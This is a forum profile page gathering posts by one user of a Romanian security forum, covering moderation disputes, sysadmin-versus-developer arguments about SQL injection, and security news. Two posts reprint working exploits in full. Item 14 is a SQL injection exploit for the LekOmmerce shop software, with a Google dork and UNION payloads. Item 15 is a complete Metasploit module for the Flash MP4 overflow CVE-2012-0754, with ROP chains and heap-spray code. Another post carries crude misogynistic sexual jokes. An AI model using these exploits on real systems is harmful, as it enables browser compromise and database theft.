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Everything posted by Nytro

  1. Daca e vorba de o retea locala, Microsoft face toti banii aici... - Communicator (Lync mai nou) permite conferinte - Outlook permite sa stabilesti meeting-uri - Share-ingul e simplu si eficient ............................... Asta daca nu te referi la managementul codului sursa, acolo e alta poveste.
  2. int main(int argc, char* argv[]) { // In argc ai numarul de parametri (+1, fisierul care se executa e argv[0]) // In argv[1]... Ai fiecare parametru // Parcurgi cu un for si vezi daca un parametru e "-name", si daca e, urmatorul parametru, daca exista, o sa fie acel fisier }
  3. Cum am spus, probabil un moderator/administrator a luat aceasta decizie, si sincer, nu stiu cine deocamdata. Problema e ca nu ne bagam peste deciziile altei persoane din staff (pe cat posibil), discutam intre noi apoi ajungem la o concluzie. Ar fi cam aiurea ca cineva sa dea ban si altcineva sa il scoata... Cand o sa aflu despre ce e vorba, probabil vei primi contul inapoi, ai rabdare o zi, doua.
  4. Mersi, ban permanent.
  5. Sunt la munca si nu am putut sa ma uit peste el sa ma dau cu parerea, nu te mai purta copilareste, ca o "attention whore". Codul e frumos organizat, dar nu am timp sa il citesc sa vad exact despre ce e vorba, o sa ma uit diseara.
  6. Daca nu il cheama "Nytro" tot degeaba.
  7. Hackeri: http://2.bp.blogspot.com/-COoyZ5u_me8/T124fMkzWZI/AAAAAAAAFMw/WjjETqyp-fo/s640/Finally+Google+Chrome+gets+hacked+at+Pwn2Own.jpg Vupen Security and Sergey Glazunov independently managed to penetrate Google Chrome’s security defenses at the Pwn2Own and 'Pwnium' contests respectively. The annual competition, which invites ethical hackers from around the world to attempt hacking into the most popular web browsers and in the process expose vulnerabilities and loopholes in the browser's security, while grabbing a handsome reward. At this year's competition, the co-founder and head of research of Vupen, Chaouki Bekrar and his team managed to break into Google Chrome in less than 5 minutes, in the process quashing talks about the browser's unquestionable security. They used "a pair of zero-day vulnerabilities to take complete control of a fully patched 64-bit Windows 7 (SP1) machine." For the successful break-in, Vupen has won itself 32 points. Google Chrome security knew that the Flash Player plugin sandbox is significantly weaker and that an exploit against Chrome’s Flash Player would have to go through a certain path.Having figured out that Vupen used that technique (from the May video), Google decided to add a specific protection for Flash. The hack qualifies him for one of the top $60,000 prizes that are part of Google’s $1 million Pwnium challenge, and could be the launch of a new security career. VUPEN co-founder Chaouki Bekrar, an outspoken exploit writer who insisted the team deliberately targeted Chrome to prove a point, was uncharacteristically coy when asked if the faulty Chrome code came from Adobe.”It was a use-after-free vulnerability in the default installation of Chrome,” he said. “Our exploit worked against the default installation so it really doesn’t matter if it’s third-party code anyway.” Bekrar told, Zdnet reports. IE 9 on Windows 7 was also hacked, again through a complicated hack that had to circumvent the browser’s sandbox. Microsoft, however, may not respond so rapidly, as its quality testing procedure usually takes a few months to fix bugs like these.Safari on Mac OS X Snow Leopard, along with Firefox and IE 8 on Windows XP, was also hacked. Sursa: Finally Google Chrome gets hacked at Pwn2Own | The Hacker News (THN)
  8. Mi-am cumparat azi "Biblia barbatului" si pot sa spun ca e geniala: - "Bea o bere in timp ce te pisi pentru a exemplifica expresia 'a intrat a si iesit'" - "Vinul potrivit pentru orice masa este, in mod surprinzator, berea" - "Nu te baga intr-o bataie intr-un bar de la tara daca nu ai castigat macar un concurs de lupte in viata ta" - "Daca o fata nu isi da jos sutienul in timpul unui masaj, e clar ca nu vei primi nimic. Renunta si deschide o cutie de bere" - "Dupa ce o tipa cu aparat dentar te-a satisfacut oral spune-i ca ti-a placut sa te dai pe sine si de acum inainte numeste-o CFR" - "Cand o tipa spune ca nu face oral, cuprinde-o tandru in brate si spune-i ca este ok, nu e nicio problema... altele fac" - "Un barbat nu poate descrie sub nicio forma o femeie grasa folosind fraza 'Are o fata draguta'" Si multe altele. E vorba despre "barbatii" din ziua de azi, ca devin din ce in ce mai femei, si incearca sa defineasca prin 900+ reguli, cum arata un barbat adevarat.
  9. Design: ISR copiat. Categorii: RST copiat. Noutati: ((void *)0)
  10. Trebuie sa existe o colaborare intre syadmin si programator, ca sysadmin nu poti bloca de exemplu "<script>" pentru ca poate ai gazduit un forum ca RST si vei bloca jumatate dintre posturi. Ca sysadmin, nu poti sa pui reguli pentru a evita SQL Injection, cum ar fi "UNION" pentru ca pot fi mesaje care sa contina acest cuvant perfect valide, care sa nu aiba nici cea mai mica legatura cu SQLI. Nu poti nici macar sa blochezi doua request-uri in mai putin de o secunda pentru ca se intampla ca aici, deschizi doua tab-uri si unul dintre ele e blocat si risti sa pierzi clienti. Programatorii vin cu tot felul de pretentii ca sa mearga scripturile lor, ceea ce e si normal, insa e problema lor sa se ocupe de securitatea APLICATIILOR WEB nu a sysadminilor. Ca folosesc scripturi 3rd party, de asemenea, e problema lor. Nu e vina sysadminului ca aplicatia are SQL Injection. Si oricum am spune, administratorii tot petrec mult timp sa verifice loguri, sa vada unde pot sa apara probleme in aplicatie si sa incerce sa le rezolve de pe partea de administrare, ceea ce repet, nu e ok, pentru ca ulterior pot sa apara probleme. Sysadmin: "Ba, esti tampit, ai SQL Injection in aplicatie, uite aici cateva loguri, uite ca unii au dat cu Acunetix si altii cu Havij, asta e parametru vulerabil, repara problema, doar nu o sa stau eu sa dau DROP la pachete pe baza de sute de vectori ce pot fi folositi pentru ca tu nu faci o filtrare pe parametrii aplicatiei".
  11. Benny, du-te si vorbeste cu un sysadmin si discutam apoi.
  12. Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 Gobejishvili (longrifle0x) from The Vulnerability Laboratory Research Team discover Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37. GOM Player (Gretech Online Movie Player) is a 32/64-bit media player for Microsoft Windows, distributed by the Gretech Corporation of South Korea. A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In this case, The vulnerability can be exploited by local or remote attackers and Vulnerable module is GomU+0x125cb7. Proof of Concept: 1) Download & open the software client 2) Click open ==> Url.. 3) Put vulnerability code 4) now you will see result http://www.youtube.com/watch?v=uN87KAm53Zg&feature=player_embedded In buffer overflow attacks, the extra data may contain codes designed to trigger actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Sursa: [POC] Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37 | The Hacker News (THN)
  13. printf() tricks Prin'() tricks Agenda • ShiMing the stack pointer & arbitrary mem writes… • … in order to exploit format string bugs without %n • When is a NULL pointer not just a NULL pointer? • …don’t expect prin'() & family to crash on NULL pointers • These are just a few things I played with a while back Download: http://cdn03.exploit-db.com/wp-content/themes/exploit/docs/18577.pdf
  14. [h=1]SQLI Online Shop LeKommerce[/h] # Author: Mazt0r # Exploit Title: Online Shop SQLI LeKommerce # Date: 04 MARCH 2012 # software: LeKommerce # link: http://www.lekommerce.com/ # Version: "All version's" # Category: Commerce online # Tested on: Linux D0rk: inurl:secc.php?id= ===================================== Exploit : ====================== http://localhost/path/secc.php?id={sqli} ====================== Example: ====================== http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7-- http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables-- ====================== dbs: ====================== +--------------------------------+ | t_clientes | | t_colores | | t_colores_idiomas | | t_configuracionglobal | | t_emailing | | t_emailingcliente | | t_facturascompra | | t_facturasventa | | t_familias | | t_familias_idiomas | | t_formaspago | | t_idiomas | | t_incidencias | | t_iva | | t_marcas | | t_menusuperior | | t_noticias | | t_productos | | t_productos_idiomas | | t_proveedores | | t_provincias | | t_rel_productos_tallas_colores | | t_rel_tallas_colores | | t_seccionesproductos | | t_seccionesproductos_idiomas | | t_series | | t_subfamilias | | t_subfamilias_idiomas | | t_tallas | | t_tallas_idiomas | | t_tiposperfiles | | t_traducciones | | t_usuarios | +--------------------------------+ PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC! --------------Gr33tZ------------------ DDLR - CYBERLOCOS - Thelatin - K4rl -Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Firends! ---------------------------------- Blog: maztor.blogspot.com Twitter: @Mazt0r ---------------------------------- Sursa: SQLI Online Shop LeKommerce
  15. [h=1]Adobe Flash Player .mp4 'cprt' Overflow"[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player MP4 'cprt' Overflow", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "Iran's Oil and Nuclear Situation.doc" e-mail attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', # Vulnerability discovery 'sinn3r', # Metasploit module 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0754' ], [ 'OSVDB', '79300'], [ 'BID', '52034' ], [ 'URL', 'http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-03.html' ] ], 'Payload' => { 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # Flash Player # Flash Player [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x800 - code.length', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 } ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x600', 'Ret' => 0x0c0c0c0c } ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 15 2012", 'DefaultTarget' => 0)) end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def nop return make_nops(4).unpack("V").first end def get_payload(t) if t['Rop'].nil? code = "" else code = "\xbc\x0c\x0c\x0c\x0c" #Fix the stack to avoid a busted encoder end code << payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt rop = [ 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN 0x00000800, # <- change size to mark as executable if needed (-> ebx) 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c351e05, # NEG EAX # RETN 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end pivot = [0x77C1CAFB].pack('V*') #POP/POP/RET pivot << [junk].pack('V*') pivot << [t.ret].pack('V*') code = pivot + rop + code return code end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[3] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[5] #IE 7 on Windows Vista else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("#{cli.peerhost}:#{cli.peerport} Browser not supported, will not launch attack: #{agent.to_s}") send_not_found(cli) return end print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}") # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...") mp4 = create_mp4(my_target) send_response(cli, mp4, {'Content-Type'=>'video/mp4'}) return end if request.uri =~ /\.swf$/ print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...") send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' }) return end p = get_payload(my_target) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js_pivot = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); heap_obj.debug(true); for (var i=1; i < 0x1C2; i++) { heap_obj.alloc(block); } heap_obj.debug(true); JS js_pivot = heaplib(js_pivot, {:noobfu => true}) swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource swf_uri << "/Exploit.swf" print_status("#{cli.peerhost}:#{cli.peerport} #{swf_uri}") html = %Q| <html> <head> <script> #{js_pivot} </script> </head> <body> <center> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="test" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> <param name="movie" value="#{swf_uri}" /> <embed src="#{swf_uri}" quality="high" width="1" height="1" name="test" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> </embed> </object> </center> </body> </html> | html = html.gsub(/^\t\t/, '') # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource # proc = Proc.new do |cli, req| on_request_uri(cli, req) end add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil print_status("#{cli.peerhost}:#{cli.peerport} Sending html...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def cleanup remove_resource('/test.mp4') rescue nil super end def exploit @swf = create_swf super end def create_swf path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0754.swf" ) fd = ::File.open( path, "rb" ) swf = fd.read(fd.stat.size) fd.close return swf end def create_mp4(target) mp4 = "" mp4 << "\x00\x00\x00\x18" mp4 << "ftypmp42" mp4 << "\x00\x00\x00\x00" mp4 << "mp42isom" mp4 << "\x00\x00\x00\x0D" mp4 << "cprt" mp4 << "\x00\xFF\xFF\xFF" mp4 << "\x00\x00\x00\x00" mp4 << "\x0c\x0c\x0c\x0c" * 2586 return mp4 end end =begin C:\WINDOWS\system32\Macromed\Flash\Flash11e.ocx C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx (510.9b4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c0c ebx=03e46810 ecx=0396b160 edx=00000004 esi=03e46cd4 edi=00000000 eip=10048b65 esp=0428fd10 ebp=0428feb4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx - Flash10x+0x48b65: 10048b65 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=???????? =end Sursa: Adobe Flash Player .mp4 'cprt' Overflow"
  16. [h=2]Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits[/h]Tackhead writes "Hot on the hooves of Sergey Glazunov's hack 5-minutes into Pwn2Own, an image of an axe-wielding pink pony was the mark of success for a hacker with the handle of Pinkie Pie. Pinkie Pie subtly tweaked Chromium's sandbox design by chaining together three zero-day vulnerabilities, thereby widening his appeal to $60K in prize money, another shot at a job opportunity at the Googleplex, and instantly making Google's $1M Pwnium contest about 20% cooler. (Let the record show that Slashdot was six years ahead of this particular curve, and that April Fool's Day is less than a month away.)" Vedeti: Teen Exploits Three Zero-Day Vulns for $60K Win in Google Chrome Hack Contest | Threat Level | Wired.com Sursa: Pinkie Pie Earns $60K At Pwn2Own With Three Chromium 0-Day Exploits - Slashdot
  17. Daca sunt sysadmin, nu e problema mea sa pun filtre pentru "SeLeCt" sau "<script>" pentru ca nu e problema mea ca programatorul nu poate filtra asta. Da, un sysadmin bun is bate capul si isi pierde timpul cu asa ceva, dar nu este problema lui. Intr-adevar, sunt multe scripturi publice vulnerabile, dar tot nu vad ce legatura ar putea avea sysadmin-ul. Asta tine de Project Manager si de cati bani baga in proiect, daca nu baga, folosesc un script public si "bum", problema lor. Sysadminul trebuie sa fie atent la problemele lui, configurarea serverului: php.ini, permisiuni fisiere, sub ce utilizatori ruleaza procesele si tot asa. Dar de multe ori vin programatori cu request-uri ca "Vreau 9999 time limit", vreau "9999 max_file_upload" sau mai stiu eu ce, fara un motiv serios si de aici apar problemele. Din moment ce vulnerabila e aplicatia web, programatorul e de vina.
  18. Nu ai fost luat peste picior, am inteles ideile, unele dau de gandit, altele nu sunt chiar atat de practice. Nu putem sterge conturile banate definitiv, pe baza lor putem stii daca membri actuali sunt printre noi (de exemplu cei care se ocupa cu carding, CC-uri... si care nu ne plac). Iar conturile vechi nu incurca pe nimeni, apar mereu persoane care nu mai activeaza de mult timp, sunt admini care nu mai activeaza de mult ci doar din cand in cand, stergerea acelor conturi ar fi penibila, nu putem forta pe cineva sa isi faca un alt cont pentru ca nu a intrat de mult timp. Cat despre curatenia forumului de posturi si topicuri inutile, se incearca tot ce se poate, in limita timpului disponibil. In fiecare zi se baneaza useri sau se muta topicuri la "Cosul de gunoi".
  19. Sa securizezi partea de aplicatie web din server e stupid si inutil. Daca programatorul e prost, merita orice deface, e pacat ca sysadminii isi pierd timp sa repare problemele programatorilor...
  20. Urmatorul...
  21. Zise cineva care s-a inregistrat de o saptamana pe forum... - De ce sa stergem sau sa banam userii? Cu ce ar putea asta incanta pe cineva? - Cum putem sti toate conturile duplicat? Presupunem ca imi fac doua conturi: "Nytro" si "Vasile", de unde stie cineva ca e vorba de aceeasi persoana? - Sunt putine posturi care sunt doar o trimitere catre un link, majoritatea prezinta continutul, insa daca e vorba de programe sau video tutoriale, nu stiu cat de ok ar fi sa le gazduim pe serverul RST, insa e si asta o idee. Cat despre tutoriale incomplete... Nu te opreste nimeni sa scrii tu tutoriale complete, sau sa le completezi pe cele existente. - Da, posturile inutile sunt o problema, insa nu cred ca sta nimeni sa ia fiecare post nou, fiecare topic din fiecare categorie si sa vada tot ce se posteaza sa poata sa faca curatenie, dureaza mai mult decat iti imaginezi. - Pentru "noobs", adica restul forumului in afara de tine, exista categoriile CERERI si AJUTOR unde isi pot expune problema si pot primi ajutorul.
  22. Bugtraq-I : Distribution for Pentesting and forensics Bugtraq system offers the most comprehensive distribution, optimal, stable and automatic security to date. Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can be installed from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel. The kernel has been patched for better performance to recognize a variety of hardware, including wireless injection patches pentesting that other distributions do not recognize. Some of the special features that you can appreciate are: · Administrative improvements of the system for better management of services. · Expanded the range of recognition for injection wireless drivers. · Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit. · Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc... · Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.) · Stability and performance optimized: Enhanced performance flash and java and start purging unnecessary services. So that the user can use only the services you really want. · It has incorporated the creation of the user in the installation, which is created with all system configurations. · We are the distribution and Forensic Pentesting with more tools built and functional, well organized menu without repetition of the same to avoid overwhelming the user. Download Bugtraq-I Sursa: Bugtraq-I : Distribution for Pentesting and forensics | The Hacker News (THN)
  23. #AntiSec hackers deface Panda Security site to protest LulzSec arrests Hackers aligned with ********* took credit on Wednesday for an attack on Panda Security's website shortly after charges were announced against five of the hacking collective's alleged members. Over 25 websites related to Panda Security have been hacked tonight by Antisec. Emails and md5 passwords have leaked to public. Panda was accused by ********* for helping the FBI to lurk ********* members. The attacks are believed to be in retaliation for the recent arrests made by the FBI. Yesterday biggest story of Hacking world exposed that, The world's most notorious computer hacker turned against his comrades because he did not want to go to prison and leave behind his two children. Monsegur, who has been described as the ringleader of LulzSec, and an 'influential member' of *********, pleaded guilty to a dozen hacking-related charges last summer - crimes which carry a maximum sentence of 124 years and six months in prison.But, rather than face a lengthy jail sentence and not see his two children, the unemployed father agreed to cooperate with the FBI, and, ever since his arrest, has reportedly been working with them to bring down the groups' top hackers. Charged Lulzsec Hackers are Ryan Ackroyd a.k.a. Kayla, lol, lolsoon Jake Davis a.k.a. topiary, atopiary Darren Martyn a.k.a. pwnsauce, raepsauce, networkkitten Donncha O'Cearrbhail a.k.a. palladium Hector Xavier Monsegur a.k.a. Sabu, Xavier DeLeon, Leon Jeremy Hammond a.k.a. Anarchaos, sup_g, burn, yohoho, POW, tylerknowsthis, crediblethreat IMAGINE: http://3.bp.blogspot.com/-FmNqd4qfqWA/T1cnIla9qhI/AAAAAAAAFI0/OSStHPEohOA/s1600/Lulzsec+hackers+arrested.png List of Defaced Sites : cybercrime.pandasecurity.com antivirus-offers.pandasecurity.com blog.cloudantivirus.com cloudofficeprotection.pandasecurity.com cloud.pandasecurity.com cloudpartnercenter.pandasecurity.com cloudprotectionbeta.pandasecurity.com.tar.gz cloudprotection.pandasecurity.com facebookfriends.pandasecurity.com forgetsecurity.co.uk forgetsecurity.co.za forgetsecurity.es go.pandasecurity.com info.pandasecurity.com information.pandasecurity.com lavuelta.pandasecurity.com maintenance.pandasecurity.com momentos.pandasecurity.com ondersteuning.pandasecurity.com pandacompetition.pandasecurity.com pandalabs.pandasecurity.com prensa.pandasecurity.com press.pandasecurity.com promo.pandasecurity.com protectyourfamily.pandasecurity.com research.pandasecurity.com securitytothecloud.pandasecurity.com serviciospro.pandasecurity.com servicos.pandasecurity.com suporte.pandasecurity.com techcenter.pandasecurity.com uninstall.cloudantivirus.com wiki.cloudantivirus.com Panda Security, the Cloud Security Company | Antivirus | Anti-Spyware | Firewall | Backup | Cloud | Security | Download | Buy Panda Security, the Cloud Security Company | Antivirus | Anti-Spyware | Firewall | Backup | Cloud | Security | Download | Buy "Pandasecurity.com, better known for its shitty ANTIVIRUS WE HAVE BACKDOORED, has earning money working with Law Enforcement to lurk and snitch on ********* activists. they helped to jail 25 ********* in different countries...yep we know about you. How does it feel to be the spied one?" In August, 2011, it came to light that ********* had hacked into 70 law enforcement websites, mostly local sheriffs’ websites in Missouri.The hacks had occurred four weeks before they were discovered. Using information passed on by Monsegur, the FBI was able to work with the server company to mitigate the damage. The FBI then alerted 300 government, financial and corporate entities around the world to potential vulnerabilities in their computer systems. AntiSec also voiced support for those fighting for their freedom in Tunisia, Egypt, Libya, Syria, Bahrain, Yemen, and Iran.It also sent a dare to the FBI to get its members, saying, "we are waiting for you." Sursa: #AntiSec hackers deface Panda Security site to protest LulzSec arrests | The Hacker News (THN) PS: Am postat asta doar ca sa vedeti fetele alora
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